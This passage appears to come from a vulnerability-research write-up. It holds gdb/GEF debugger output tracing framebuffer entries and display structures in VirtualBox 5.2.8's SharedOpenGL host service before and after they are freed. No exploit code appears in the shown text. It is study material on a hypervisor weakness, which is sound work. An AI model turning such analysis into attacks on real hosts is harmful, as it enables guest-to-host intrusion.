data-line=\"crayon-5b7b3e582f50b912176048-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f50b912176048-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f50b912176048-58\">58<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-1\"><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;VDMA&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hit <\/span><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CrFbDisplayBase<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">fbCleanupRemoveAllEntries<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fb79d69aec0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">HostServices<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SharedOpenGL<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">crserverlib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">presenter<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">display_base<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">320<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-2\"><span class=\"crayon-cn\">320<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pEntry<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CrVrScrCompositorConstIterNext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">Iter<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-3\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">pl<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-4\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4e80<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-5\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4d00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-6\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4dc0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-7\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4f40<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-8\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4c40<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-9\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4b80<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-10\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4a00<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-11\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4940<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-12\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4ac0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-13\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">pli<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-14\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4e80<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-15\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">11<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-16\"><span class=\"crayon-cn\">0x7fb79d130260<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79c0074b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc71ef0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-17\"><span class=\"crayon-cn\">0x7fb79d130270<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-18\"><span class=\"crayon-cn\">0x7fb79d130280<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-19\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4d00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-20\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-21\"><span class=\"crayon-cn\">0x7fb79cc729f0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79c0074b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d06dd40<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-22\"><span class=\"crayon-cn\">0x7fb79cc72a00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-23\"><span class=\"crayon-cn\">0x7fb79cc72a10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-24\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4dc0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-25\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-26\"><span class=\"crayon-cn\">0x7fb79cc81690<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79c0074b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79e1d7c50<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-27\"><span class=\"crayon-cn\">0x7fb79cc816a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-28\"><span class=\"crayon-cn\">0x7fb79cc816b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-29\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4f40<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-30\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">17<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-31\"><span class=\"crayon-cn\">0x7fb79d66a310<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79c0074b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81390<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-32\"><span class=\"crayon-cn\">0x7fb79d66a320<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-33\"><span class=\"crayon-cn\">0x7fb79d66a330<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-34\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4c40<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-35\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-36\"><span class=\"crayon-cn\">0x7fb79cc67450<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79c0074b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc7ba00<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-37\"><span class=\"crayon-cn\">0x7fb79cc67460<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-38\"><span class=\"crayon-cn\">0x7fb79cc67470<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0003506100010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-39\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4b80<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-40\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-41\"><span class=\"crayon-cn\">0x7fb79d12dc50<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79c0074b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12f080<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-42\"><span class=\"crayon-cn\">0x7fb79d12dc60<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-43\"><span class=\"crayon-cn\">0x7fb79d12dc70<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-44\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">22<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4a00<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-45\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-46\"><span class=\"crayon-cn\">0x7fb79d66a2b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79c0074b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12f330<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-47\"><span class=\"crayon-cn\">0x7fb79d66a2c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-48\"><span class=\"crayon-cn\">0x7fb79d66a2d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0003506f00010101<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-49\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4940<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-50\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">25<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-51\"><span class=\"crayon-cn\">0x7fb79cf983c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79c0074b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc81400<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-52\"><span class=\"crayon-cn\">0x7fb79cf983d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-53\"><span class=\"crayon-cn\">0x7fb79cf983e0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-54\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CR_FRAMEBUFFER_ENTRY *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7fb7ac0f4ac0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-55\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">27<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;H3DORInstance:&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-56\"><span class=\"crayon-cn\">0x7fb79d0a7430<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79c0074b0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc814f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f50b912176048-57\"><span class=\"crayon-cn\">0x7fb79d0a7440<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f50b912176048-58\"><span class=\"crayon-cn\">0x7fb79d0a7450<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0105 seconds] -->  <\/p>\n<p>They look fine. Now lets pass one iteration to free all the displays and dump the display structures again.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f514775088597\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  c  Continuing.  [Thread 0x7fb791e05700 (LWP 3722) exited]  [Thread 0x7fb793fff700 (LWP 3723) exited]    Thread 43 &#8220;VDMA&#8221; hit Breakpoint 4, CrFbDisplayBase::fbCleanupRemoveAllEntries (this=0x7fb79d69aec0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:320  320\t    while ((pEntry = CrVrScrCompositorConstIterNext(&amp;Iter)) != NULL)  gef\u27a4  pl  $28 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4e80  $29 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4d00  $30 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4dc0  $31 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4f40  $32 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4c40  $33 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4b80  $34 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4a00  $35 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4940  $36 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4ac0  gef\u27a4  pli  $37 = (CR_FRAMEBUFFER_ENTRY *) 0x7fb7ac0f4e80  $38 = &#8220;H3DORInstance:&#8221;  0x7fb79d130260:\t0x00007fb79cc81460\t0x00007fb79cc71ef0  0x7fb79d130270:\t0x0000000000000000\t0x0000029b00000556  0x7fb79d130280:\t0x0000000000010101  $39 = 